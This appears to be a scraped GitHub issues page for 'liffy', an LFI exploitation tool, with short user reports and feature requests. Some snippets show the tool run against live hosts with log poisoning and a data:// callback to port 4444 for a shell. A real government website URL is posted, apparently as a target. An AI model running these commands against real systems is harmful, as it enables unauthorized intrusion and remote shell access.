liffy

liffy copied to clipboard

``` (liffy) [user@host ~/liffy ]$ python liffy.py "http://xxxxx:49768/?file=" -a -l /var/apache2/access.log _ _ __ __ ___ ___ | | (_)/ _|/ _| |__ \ / _ \ | | _|...

craig

Update liffy.py

2

- Make the code more clear, remove useless variables. - Show the help message if the user does not provide any arguments. 

j4k0m

liffy.py

7

I'm execute this command python3 liffy.py http://206.209.126.5/includes/header.php?systempath= -d -e -i Liffy v2.0 [~] Checking Target: 206.209.126.5 [~] Testing with data:// [?] Host For Callbacks: 192.168.1.54 [?] Port For Callbacks: 4444...

shivamking05675

http://www.codercaste.com/2009/10/03/the-null-byte-poisoning-attack-explained/ https://web.archive.org/web/20170617080614/hakipedia.com/index.php/Poison_Null_Byte Showcased on OWASP Juice shop: https://bkimminich.gitbooks.io/pwning-owasp-juice-shop/content/appendix/solutions.html#access-a-developers-forgotten-backup-file

ItsIgnacioPortal

It would be nice if we can perform LFI testing without having to give a shell back. Just to shell if any parameter is vulnerable or not

mzfr

There should be an option to test for directory traversal while taking payload from a file.

mzfr

https://www.el-mouradia.dz/ar/president?page=1

1

https://www.el-mouradia.dz/ar/president?page=1

Redha197